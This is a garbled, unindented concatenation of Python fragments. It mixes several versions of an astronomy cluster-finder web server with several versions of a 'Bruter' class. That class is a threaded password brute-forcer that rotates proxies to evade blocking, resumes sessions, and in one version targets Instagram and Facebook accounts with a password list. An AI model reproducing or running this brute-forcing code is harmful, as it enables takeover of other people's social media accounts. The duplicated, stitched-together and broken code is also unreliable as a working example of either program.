def __init__(self):
self.passwords = PasswordManager()
self.runner = ICFRunner('xmatch')
self.runner.override = True
self.current_user = None
self.config = Config('icfcherry.conf')
self.iidmanager = IIDmanager(self)
def __init__(self, username: str, threads: int, passlist_path: str):
self.is_alive = True
self.is_found = False
self.password: str = None
self.username: str = username
self.last_password: str = None
self.bots_per_proxy = 0
self.total_threads: int = threads
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(username, passlist_path,
threads, self.display)
self.browsers: typing.List[Browser] = []
self.active_passwords: typing.List[str] = []
self.unstarted_browsers: typing.List[Browser] = []
# Locks
self.lock_browsers = threading.RLock()
self.lock_unstarted_browsers = threading.RLock()
self.lock_active_passwords = threading.RLock()
self.lock_password_manager = threading.RLock()
def __init__(self, username, threads, passlist_path):
self.browsers = []
self.lock = RLock()
self.password = None
self.is_alive = True
self.is_found = False
self.bots_per_proxy = 0
self.username = username
self.last_password = None
self.active_passwords = []
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(username,
passlist_path, threads)
def __init__(self):
self.passwords = PasswordManager()
self.runner = ICFRunner('xmatch')
self.runner.override = True
self.current_user = None
self.config = Config('icfcherry.conf')
self.iidmanager = IIDmanager(self)
class ICFServer(object):
ROOT = '/icf'
LOGIN = '******'
def __init__(self):
self.passwords = PasswordManager()
self.runner = ICFRunner('xmatch')
self.runner.override = True
self.current_user = None
self.config = Config('icfcherry.conf')
self.iidmanager = IIDmanager(self)
def check_auth(self):
if self.current_user is None:
raise cherrypy.HTTPRedirect(self.LOGIN)
def start(self):
cherrypy.config.update(self.config)
cherrypy.tree.mount(self, '/', config=self.config)
cherrypy.tree.mount(self.iidmanager, '/iid', config=self.config)
cherrypy.engine.start()
cherrypy.engine.block()
def get_basic(self):
return {'username': self.current_user,
'root': self.ROOT}
def default(self):
template = JINJA.get_template('root.template')
return template.render({'username': self.current_user,
'root': self.ROOT})
@cherrypy.expose
def index(self):
print 'Called index'
if self.current_user is None:
raise cherrypy.HTTPRedirect(self.LOGIN)
else:
return self.default()
@cherrypy.expose
def login(self, username=None, password=None):
if username is None or password is None:
raise cherrypy.HTTPRedirect(self.LOGIN)
login_result = self.passwords.verify_password(username, password)
if login_result == self.passwords.PASSWORD_FAILED:
raise cherrypy.HTTPError(401, "Password failed!")
elif login_result == self.passwords.USER_NOT_EXISTS:
raise cherrypy.HTTPError(401, "User does not exist!")
else:
self.current_user = username
cherrypy.session[SESSION_KEY] = cherrypy.request.login = username
raise cherrypy.HTTPRedirect(self.ROOT)
@cherrypy.expose
def logout(self):
sess = cherrypy.session
username = sess.get(SESSION_KEY, None)
sess[SESSION_KEY] = None
if username:
cherrypy.request.login = None
self.current_user = None
raise cherrypy.HTTPRedirect(self.ROOT)
class Bruter(object):
def __init__(self, username: str, threads: int, passlist_path: str):
self.is_alive = True
self.is_found = False
self.password: str = None
self.username: str = username
self.last_password: str = None
self.bots_per_proxy = 0
self.total_threads: int = threads
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(username, passlist_path,
threads, self.display)
self.browsers: typing.List[Browser] = []
self.active_passwords: typing.List[str] = []
self.unstarted_browsers: typing.List[Browser] = []
# Locks
self.lock_browsers = threading.RLock()
self.lock_unstarted_browsers = threading.RLock()
self.lock_active_passwords = threading.RLock()
self.lock_password_manager = threading.RLock()
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.password_manager.session.delete()
else:
if self.is_found:
self.password_manager.session.delete()
else:
self.password_manager.session.write(
self.password_manager.attempts,
self.password_manager.passlist,
)
def browser_manager(self):
while self.is_alive:
browsers: typing.List[Browser] = []
with self.lock_browsers:
browsers = [br for br in self.browsers]
for browser in browsers:
if not self.is_alive:
break
if (Display.account_exists == None
and Browser.account_exists != None):
Display.account_exists = Browser.account_exists
if not browser.is_active:
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = browser.password
self.is_found = True
with self.lock_password_manager:
self.password_manager.list_remove(browser.password)
self.remove_browser(browser)
else:
if browser.start_time:
if (time.time() - browser.start_time >=
max_time_to_wait):
browser.close()
with self.lock_active_passwords:
try:
self.active_passwords.remove(
browser.password)
except ValueError:
pass
def prune_browsers(self, browser) -> None:
"""Remove all the browsers with the same password as the given browser"""
with self.lock_browsers:
for br in list(self.browsers):
if br == browser:
continue
if br.password != browser.password:
continue
try:
self.browsers.remove(br)
except ValueError:
pass
br.close()
br.proxy.decr_usage()
self.proxy_manager.dispose(br.proxy)
with self.lock_unstarted_browsers:
for br in list(self.unstarted_browsers):
if br.password == browser.password:
try:
self.unstarted_browsers.remove(br)
except ValueError:
pass
def remove_browser(self, browser: Browser) -> None:
self.proxy_manager.dispose(browser.proxy)
with self.lock_browsers:
try:
self.browsers.remove(browser)
except ValueError:
pass
with self.lock_active_passwords:
try:
self.active_passwords.remove(browser.password)
except ValueError:
pass
if browser.is_attempted:
self.prune_browsers(browser)
def attack(self):
attack_started = False
proxy_per_pwd = 3
while self.is_alive:
for pwd in self.password_manager.passlist:
if not self.is_alive:
break
with self.lock_unstarted_browsers:
if len(self.unstarted_browsers) >= self.total_threads:
break
with self.lock_active_passwords:
if pwd in self.active_passwords:
continue
is_added = False
for _ in range(proxy_per_pwd):
with self.lock_unstarted_browsers:
if len(self.unstarted_browsers) >= self.total_threads:
break
proxy = self.proxy_manager.get_proxy()
if not proxy:
continue
with self.lock_unstarted_browsers:
self.unstarted_browsers.append(
Browser(self.username, pwd, proxy))
is_added = True
if not is_added:
break
with self.lock_active_passwords:
self.active_passwords.append(pwd)
if not attack_started:
self.display.info("Starting attack...")
attack_started = True
with self.lock_unstarted_browsers:
for br in list(self.unstarted_browsers):
with self.lock_browsers:
if len(self.browsers) >= self.total_threads:
break
else:
self.browsers.append(br)
self.unstarted_browsers.remove(br)
threading.Thread(target=br.attempt, daemon=True).start()
def start_daemon_threads(self):
attack = threading.Thread(target=self.attack)
browser_manager = threading.Thread(target=self.browser_manager)
password_manager = threading.Thread(target=self.password_manager.start)
attack.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
browser_manager.start()
password_manager.start()
self.display.info("Searching for proxies...")
def stop_daemon_threads(self):
self.password_manager.stop()
def start(self):
self.display.info("Initiating daemon threads...")
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if (last_attempt == self.password_manager.attempts
and self.password_manager.attempts):
time.sleep(0.65)
continue
browsers = []
with self.lock_browsers:
browsers = [br for br in self.browsers]
for browser in browsers:
self.display.stats(
browser.password,
self.password_manager.attempts,
len(self.browsers),
)
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if (self.password_manager.is_read
and not self.password_manager.list_size
and not len(self.browsers)):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.password_manager.session.is_busy = False
class Bruter(object):
def __init__(self, username, threads, passlist_path):
self.browsers = []
self.lock = RLock()
self.password = None
self.is_alive = True
self.is_found = False
self.bots_per_proxy = 0
self.username = username
self.last_password = None
self.active_passwords = []
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(username,
passlist_path, threads)
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.password_manager.session.delete()
else:
if self.is_found:
self.password_manager.session.delete()
else:
self.password_manager.session.write(self.password_manager.attempts,
self.password_manager.passlist)
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
if Display.account_exists == None and Browser.account_exists != None:
Display.account_exists = Browser.account_exists
if not browser.is_active:
password = browser.password
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = password
self.is_found = True
with self.lock:
self.password_manager.list_remove(password)
else:
with self.lock:
self.proxy_manager.bad_proxy(browser.proxy)
self.remove_browser(browser)
else:
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.close()
def remove_browser(self, browser):
if browser in self.browsers:
with self.lock:
self.browsers.pop(self.browsers.index(browser))
self.active_passwords.pop(
self.active_passwords.index(browser.password)
)
def attack(self):
proxy = None
is_attack_started = False
while self.is_alive:
browsers = []
for password in self.password_manager.passlist:
if not self.is_alive:
break
if not proxy:
proxy = self.proxy_manager.get_proxy()
self.bots_per_proxy = 0
if self.bots_per_proxy >= max_bots_per_proxy:
proxy = None
if not proxy:
continue
if not password in self.active_passwords and password in self.password_manager.passlist:
browser = Browser(self.username, password, proxy)
browsers.append(browser)
self.bots_per_proxy += 1
if not is_attack_started:
self.display.info('Starting attack ...')
is_attack_started = True
with self.lock:
self.browsers.append(browser)
self.active_passwords.append(password)
for browser in browsers:
thread = Thread(target=browser.attempt)
thread.daemon = True
try:
thread.start()
except:
self.remove_browser(browser)
def start_daemon_threads(self):
attack = Thread(target=self.attack)
browser_manager = Thread(target=self.browser_manager)
proxy_manager = Thread(target=self.proxy_manager.start)
password_manager = Thread(target=self.password_manager.start)
attack.daemon = True
proxy_manager.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
proxy_manager.start()
browser_manager.start()
password_manager.start()
self.display.info('Searching for proxies ...')
def stop_daemon_threads(self):
self.proxy_manager.stop()
self.password_manager.stop()
def start(self):
self.display.info('Initiating daemon threads ...')
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if last_attempt == self.password_manager.attempts and self.password_manager.attempts:
sleep(1.5)
continue
for browser in self.browsers:
self.display.stats(
browser.password, self.password_manager.attempts, len(self.browsers))
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if self.password_manager.is_read and not self.password_manager.list_size and not len(self.browsers):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.password_manager.session.is_busy = False
class Bruter:
def __init__(self, service, username, threads, passlist_path):
self.browsers = []
self.lock = RLock()
self.password = None
self.is_alive = True
self.is_found = False
self.bots_per_proxy = 0
self.service = service.casefold().strip()
self.username = username
self.last_password = None
self.active_passwords = []
self.proxy_manager = ProxyManager()
self.display = Display(username, passlist_path)
self.password_manager = PasswordManager(service, username,
passlist_path, threads,
self.display)
def manage_session(self):
if self.password_manager.is_read:
if not self.password_manager.list_size or self.is_found:
self.password_manager.session.delete()
else:
if self.is_found:
self.password_manager.session.delete()
else:
self.password_manager.session.write(
self.password_manager.attempts,
self.password_manager.passlist)
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
account_exists = self.create_browser(
None, None).__class__.account_exists
if Display.account_exists is None and account_exists is not None:
Display.account_exists = account_exists
if not browser.is_active:
password = browser.password
if browser.is_attempted and not browser.is_locked:
if browser.is_found and not self.is_found:
self.password = password
self.is_found = True
with self.lock:
self.password_manager.list_remove(password)
else:
with self.lock:
self.proxy_manager.bad_proxy(browser.proxy)
self.remove_browser(browser)
else:
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.close()
def remove_browser(self, browser):
if browser in self.browsers:
with self.lock:
self.browsers.pop(self.browsers.index(browser))
self.active_passwords.pop(
self.active_passwords.index(browser.password))
def create_browser(self, password, proxy):
from lib.browsers.instagram import InstagramBrowser
from lib.browsers.facebook import FacebookBrowser
if self.service == 'instagram':
return InstagramBrowser(self.username, password, proxy)
if self.service == 'facebook':
return FacebookBrowser(self.username, password, proxy)
else:
self.display.warning('Browser not found for service {}'.format(
self.service))
raise RuntimeError('')
def attack(self):
proxy = None
is_attack_started = False
while self.is_alive:
browsers = []
for password in self.password_manager.passlist:
if not self.is_alive:
break
if not proxy:
proxy = self.proxy_manager.get_proxy()
self.bots_per_proxy = 0
if self.bots_per_proxy >= max_bots_per_proxy:
proxy = None
if not proxy:
continue
if password not in self.active_passwords and password in self.password_manager.passlist:
browser = self.create_browser(password, proxy)
browsers.append(browser)
self.bots_per_proxy += 1
if not is_attack_started:
self.display.info('Starting attack ...')
is_attack_started = True
with self.lock:
self.browsers.append(browser)
self.active_passwords.append(password)
for browser in browsers:
thread = Thread(target=browser.attempt)
thread.daemon = True
try:
thread.start()
except:
self.remove_browser(browser)
def start_daemon_threads(self):
attack = Thread(target=self.attack)
browser_manager = Thread(target=self.browser_manager)
proxy_manager = Thread(target=self.proxy_manager.start)
password_manager = Thread(target=self.password_manager.start)
attack.daemon = True
proxy_manager.daemon = True
browser_manager.daemon = True
password_manager.daemon = True
attack.start()
proxy_manager.start()
browser_manager.start()
password_manager.start()
self.display.info('Searching for proxies ...')
def stop_daemon_threads(self):
self.proxy_manager.stop()
self.password_manager.stop()
def start(self):
self.display.info('Initiating daemon threads ...')
self.start_daemon_threads()
last_attempt = 0
while self.is_alive and not self.is_found:
if last_attempt == self.password_manager.attempts and self.password_manager.attempts:
sleep(1.5)
continue
for browser in self.browsers:
self.display.stats(browser.password,
self.password_manager.attempts,
len(self.browsers))
last_attempt = self.password_manager.attempts
self.last_password = browser.password
if not self.is_alive or self.is_found:
break
if self.password_manager.is_read and not self.password_manager.list_size and not len(
self.browsers):
self.is_alive = False
def stop(self):
self.is_alive = False
self.manage_session()
self.stop_daemon_threads()
self.password_manager.session.is_busy = False
def __init__(self):
self.passwords = PasswordManager()
self.runner = ICFRunner('xmatch')
self.runner.override = True
self.current_user = None
class ICFServer(object):
"""
Integrated cluster finder server class.
"""
SESSION_PATH = '%s/.sessions' % os.path.dirname(__file__)
VALID_COMMANDS = [
'login', 'logout', 'ls', 'remove', 'download', 'get_detections',
'get_members', 'create_iid', 'delete_iid', 'crawl', 'run_icf',
'plot_lambda', 'list_iids'
]
"""
This code can be used to create a list of available formats:
(not used directly for performance)
import astropy.io.registry as reg
fmt = [ f[1] for f in reg.get_formats() ]
fmt
','.join(fmt)
"""
VALID_FORMATS = 'ascii,ascii.aastex,ascii.basic,ascii.cds,ascii.commented_header,ascii.daophot,ascii.fixed_width,ascii.fixed_width_no_header,ascii.fixed_width_two_line,ascii.ipac,ascii.latex,ascii.no_header,ascii.rdb,ascii.sextractor,ascii.tab,fits,hdf5,votable,aastex,cds,daophot,ipac,latex,rdb'.split(
',')
def __init__(self):
self.passwords = PasswordManager()
self.runner = ICFRunner('xmatch')
self.runner.override = True
self.current_user = None
def set_cookie(self, cookie):
self.current_user = MyCookie.get_cookie(cookie)
def _is_logged_in(self):
return self.current_user is not None
def get_user_dir(self):
"""
Get a data folder for the current user.
Creates folder if it does not exist.
"""
user_dir = '%s/icfhome/%s' % (os.path.dirname(__file__),
self.current_user)
ensure_dir(user_dir)
return user_dir
def validate_path(self, path):
"""
Check if a given path is in the user directory.
"""
user_dir = self.get_user_dir()
full_path = os.path.abspath('%s/%s' % (user_dir, path))
return os.path.commonprefix((user_dir, full_path)) == user_dir
@binary_method
@print_method
def login(self, user, password):
log.info('%s loggin in...', user)
login_result = self.passwords.verify_password(user, password)
if login_result == self.passwords.PASSWORD_OK:
self.current_user = user
cookie = MyCookie.create_cookie(user)
return """Content-Type: text/html
Set-Cookie: id=%s
Ok""" % cookie
elif login_result == self.passwords.PASSWORD_FAILED:
return get_response(401, "Password failed!")
elif login_result == self.passwords.USER_NOT_EXISTS:
return get_response(401, "User does not exist!")
@text_method
@print_method
def logout(self):
if self._is_logged_in():
return get_response(200)
else:
return get_response(401, 'Not logged in')
@text_method
@print_method
def change_password(self, new_password):
if self._is_logged_in():
self.passwords.create_user(self.current_user, new_password)
return get_response(200, 'Ok for user %s' % self.current_user)
else:
return get_response(403, 'Not allowed')
@text_method
@print_method
def create_iid(self, iid, ra, dec):
if self._is_logged_in():
value = self.runner.create_iid(self.current_user, iid, ra, dec)
self.runner.conn.commit()
return get_response(
200,
'Ok for user %s, new iid = %s' % (self.current_user, value))
else:
return get_response(403, 'Unable to create iid')
@text_method
@print_method
def delete_iid(self, iid):
if self._is_logged_in():
value = self.runner.delete_iid(self.current_user, iid)
self.runner.conn.commit()
return get_response(
200,
'Ok for user %s, iid %s deleted' % (self.current_user, value))
else:
return get_response(403, 'Not logged in')
@text_method
@print_method
def ls(self):
if self._is_logged_in():
user_dir = self.get_user_dir()
cut_position = len(user_dir) + 1
files = glob('%s/*' % user_dir)
return get_response(200,
'\n'.join([f[cut_position:] for f in files]))
else:
return get_response(403, 'Not logged in')
@binary_method
@non_print_method
def download(self, filename):
"""
Download file from the server.
"""
if self._is_logged_in():
user_dir = self.get_user_dir()
filepath = '%s/%s' % (user_dir, filename)
if os.path.exists(filepath) and \
self.validate_path(filepath):
print """Content-Type:application/octet-stream; name="%s"
Content-Disposition: attachment; filename="%s"
""" % (filepath, filepath)
# Actual File Content will go hear.
result_file = open(filepath, "rb")
print result_file.read()
# Close opend file
result_file.close()
return None
else:
return get_response(403, "File not found: %s" % filepath)
else:
return get_response(403, 'Not logged in')
@text_method
@print_method
def run_icf(self, iid):
if self._is_logged_in():
self.runner.run_icf(self.current_user, iid)
return get_response(200, 'Cluster finder done')
else:
return get_response(403, 'Not logged in')
@text_method
@print_method
def crawl(self, iid):
if self._is_logged_in():
self.runner.crawl(self.current_user, iid)
return get_response(200)
else:
return get_response(403, 'Not logged in')
@binary_method
@print_method
def get_detections(self, iid, filename=None, format='votable'):
if self._is_logged_in():
if format not in self.VALID_FORMATS:
return get_response(
400, """Invalid format %s!
valid formats are: %s""" % (format, self.VALID_FORMATS))
user_dir = self.get_user_dir()
if filename is None:
out_file = 'detections_%s.%s' % (iid, format)
else:
out_file = filename
self.runner.get_detections(self.current_user, iid,
'%s/%s' % (user_dir, out_file), format)
return self.download(out_file)
else:
return get_response(403, 'Not logged in')
@binary_method
@print_method
def get_members(self, iid, filename=None, format='votable'):
if self._is_logged_in():
if format not in self.VALID_FORMATS:
return get_response(
400, """Invalid format %s!
valid formats are: %s""" % (format, self.VALID_FORMATS))
user_dir = self.get_user_dir()
if filename is None:
out_file = 'members_%s.%s' % (iid, format)
else:
out_file = filename
self.runner.get_members(self.current_user, iid,
'%s/%s' % (user_dir, out_file), format)
return self.download(out_file)
else:
return get_response(403, 'Not logged in')
@binary_method
@print_method
def list_iids(self, filename=None, format='votable'):
if self._is_logged_in():
if format not in self.VALID_FORMATS:
return get_response(
400, """Invalid format %s!
valid formats are: %s""" % (format, self.VALID_FORMATS))
user_dir = self.get_user_dir()
if filename is None:
out_file = 'iids.%s' % format
else:
out_file = filename
self.runner.list_iids(self.current_user,
'%s/%s' % (user_dir, out_file), format)
return self.download(out_file)
else:
return get_response(403, 'Not logged in')
@binary_method
@print_method
def plot_lambda(self, iid, filename=None):
if self._is_logged_in():
user_dir = self.get_user_dir()
if filename is None:
out_file = '%s/plot_%s.png' % (user_dir, iid)
else:
out_file = filename
self.runner.plot_one(self.current_user, iid,
'%s/%s' % (user_dir, out_file))
return self.download(out_file)
else:
return get_response(403, 'Not logged in')
@text_method
@print_method
def remove(self, filename):
if self._is_logged_in():
if self.validate_path(filename):
user_dir = self.get_user_dir()
silentremove('%s/%s' % (user_dir, filename))
return get_response(200, 'File %s deleted' % filename)
else:
return get_response(403, 'No access to file %s' % filename)
else:
return get_response(403, 'Not logged in')
class ICFServer(object):
ROOT = '/icf'
LOGIN = '******'
def __init__(self):
self.passwords = PasswordManager()
self.runner = ICFRunner('xmatch')
self.runner.override = True
self.current_user = None
self.config = Config('icfcherry.conf')
self.iidmanager = IIDmanager(self)
def check_auth(self):
if self.current_user is None:
raise cherrypy.HTTPRedirect(self.LOGIN)
def start(self):
cherrypy.config.update(self.config)
cherrypy.tree.mount(self, '/', config=self.config)
cherrypy.tree.mount(self.iidmanager, '/iid', config=self.config)
cherrypy.engine.start()
cherrypy.engine.block()
def get_basic(self):
return {'username': self.current_user, 'root': self.ROOT}
def default(self):
template = JINJA.get_template('root.template')
return template.render({
'username': self.current_user,
'root': self.ROOT
})
@cherrypy.expose
def index(self):
print 'Called index'
if self.current_user is None:
raise cherrypy.HTTPRedirect(self.LOGIN)
else:
return self.default()
@cherrypy.expose
def login(self, username=None, password=None):
if username is None or password is None:
raise cherrypy.HTTPRedirect(self.LOGIN)
login_result = self.passwords.verify_password(username, password)
if login_result == self.passwords.PASSWORD_FAILED:
raise cherrypy.HTTPError(401, "Password failed!")
elif login_result == self.passwords.USER_NOT_EXISTS:
raise cherrypy.HTTPError(401, "User does not exist!")
else:
self.current_user = username
cherrypy.session[SESSION_KEY] = cherrypy.request.login = username
raise cherrypy.HTTPRedirect(self.ROOT)
@cherrypy.expose
def logout(self):
sess = cherrypy.session
username = sess.get(SESSION_KEY, None)
sess[SESSION_KEY] = None
if username:
cherrypy.request.login = None
self.current_user = None
raise cherrypy.HTTPRedirect(self.ROOT)